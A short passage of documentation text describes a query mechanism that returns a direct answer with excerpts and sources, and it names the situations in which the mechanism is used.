The response will contain a direct answer to the question and relevant excerpts and sources from the documentation.

Use this mechanism when the answer is not explicitly present in the current page, you need clarification or additional context, or you want to retrieve related documentation sections.
